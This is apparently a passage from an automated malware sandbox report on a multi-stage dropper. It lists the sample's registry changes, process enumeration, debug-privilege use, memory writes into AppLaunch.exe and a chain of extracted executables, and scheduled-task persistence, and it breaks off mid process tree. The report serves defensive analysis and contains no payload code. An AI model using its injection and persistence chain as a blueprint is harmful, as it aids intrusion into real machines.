Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\A298.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2860 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\db7da9a9f7e5b436a0d7a82413ad95364c07378989267218e9bab7b9b71e6716.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2860 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\db7da9a9f7e5b436a0d7a82413ad95364c07378989267218e9bab7b9b71e6716.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2860 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\db7da9a9f7e5b436a0d7a82413ad95364c07378989267218e9bab7b9b71e6716.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2860 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\db7da9a9f7e5b436a0d7a82413ad95364c07378989267218e9bab7b9b71e6716.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2860 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\db7da9a9f7e5b436a0d7a82413ad95364c07378989267218e9bab7b9b71e6716.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2860 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\db7da9a9f7e5b436a0d7a82413ad95364c07378989267218e9bab7b9b71e6716.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3284 wrote to memory of 5032 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\9EEB.exe
PID 3284 wrote to memory of 5032 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\9EEB.exe
PID 3284 wrote to memory of 5032 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\9EEB.exe
PID 3284 wrote to memory of 4724 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\A053.exe
PID 3284 wrote to memory of 4724 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\A053.exe
PID 3284 wrote to memory of 4724 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\A053.exe
PID 3284 wrote to memory of 5072 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3284 wrote to memory of 5072 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3284 wrote to memory of 3900 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\A1EB.exe
PID 3284 wrote to memory of 3900 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\A1EB.exe
PID 3284 wrote to memory of 3900 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\A1EB.exe
PID 5032 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\9EEB.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vF0Yw6Gv.exe
PID 5032 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\9EEB.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vF0Yw6Gv.exe
PID 5032 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\9EEB.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vF0Yw6Gv.exe
PID 3284 wrote to memory of 980 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\A298.exe
PID 3284 wrote to memory of 980 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\A298.exe
PID 3284 wrote to memory of 980 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\A298.exe
PID 3208 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vF0Yw6Gv.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JD7oZ9jo.exe
PID 3208 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vF0Yw6Gv.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JD7oZ9jo.exe
PID 3208 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vF0Yw6Gv.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JD7oZ9jo.exe
PID 3284 wrote to memory of 1176 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\A345.exe
PID 3284 wrote to memory of 1176 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\A345.exe
PID 3284 wrote to memory of 1176 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\A345.exe
PID 1116 wrote to memory of 4528 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JD7oZ9jo.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Yi0Qu7Ko.exe
PID 1116 wrote to memory of 4528 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JD7oZ9jo.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Yi0Qu7Ko.exe
PID 1116 wrote to memory of 4528 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JD7oZ9jo.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Yi0Qu7Ko.exe
PID 3284 wrote to memory of 4372 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\A4DC.exe
PID 3284 wrote to memory of 4372 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\A4DC.exe
PID 3284 wrote to memory of 4372 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\A4DC.exe
PID 4528 wrote to memory of 3088 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Yi0Qu7Ko.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dT9yG7Sf.exe
PID 4528 wrote to memory of 3088 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Yi0Qu7Ko.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dT9yG7Sf.exe
PID 4528 wrote to memory of 3088 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Yi0Qu7Ko.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dT9yG7Sf.exe
PID 3088 wrote to memory of 1844 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dT9yG7Sf.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Rs37xE9.exe
PID 3088 wrote to memory of 1844 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dT9yG7Sf.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Rs37xE9.exe
PID 3088 wrote to memory of 1844 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dT9yG7Sf.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Rs37xE9.exe
PID 5072 wrote to memory of 3628 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5072 wrote to memory of 3628 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1176 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\A345.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 1176 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\A345.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 1176 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\A345.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 3872 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 3872 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 3872 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 3628 wrote to memory of 4740 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3628 wrote to memory of 4740 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3872 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe
PID 3872 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe
PID 3872 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe
PID 3284 wrote to memory of 3076 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp
PID 3284 wrote to memory of 3076 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp
PID 3284 wrote to memory of 3076 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp
PID 3284 wrote to memory of 1348 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\C7D7.exe
PID 3284 wrote to memory of 1348 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\C7D7.exe
PID 3284 wrote to memory of 1348 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\C7D7.exe
PID 4708 wrote to memory of 1624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\backgroundTaskHost.exe
PID 4708 wrote to memory of 1624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\backgroundTaskHost.exe
PID 4708 wrote to memory of 1624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\backgroundTaskHost.exe
PID 5072 wrote to memory of 4468 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\db7da9a9f7e5b436a0d7a82413ad95364c07378989267218e9bab7b9b71e6716.exe

"C:\Users\Admin\AppData\Local\Temp\db7da9a9f7e5b436a0d7a82413ad95364c07378989267218e9bab7b9b71e6716.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\9EEB.exe

C:\Users\Admin\AppData\Local\Temp\9EEB.exe

C:\Users\Admin\AppData\Local\Temp\A053.exe

C:\Users\Admin\AppData\Local\Temp\A053.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A11F.bat" "

C:\Users\Admin\AppData\Local\Temp\A1EB.exe

C:\Users\Admin\AppData\Local\Temp\A1EB.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vF0Yw6Gv.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vF0Yw6Gv.exe

C:\Users\Admin\AppData\Local\Temp\A298.exe

C:\Users\Admin\AppData\Local\Temp\A298.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JD7oZ9jo.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JD7oZ9jo.exe

C:\Users\Admin\AppData\Local\Temp\A345.exe

C:\Users\Admin\AppData\Local\Temp\A345.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Yi0Qu7Ko.exe

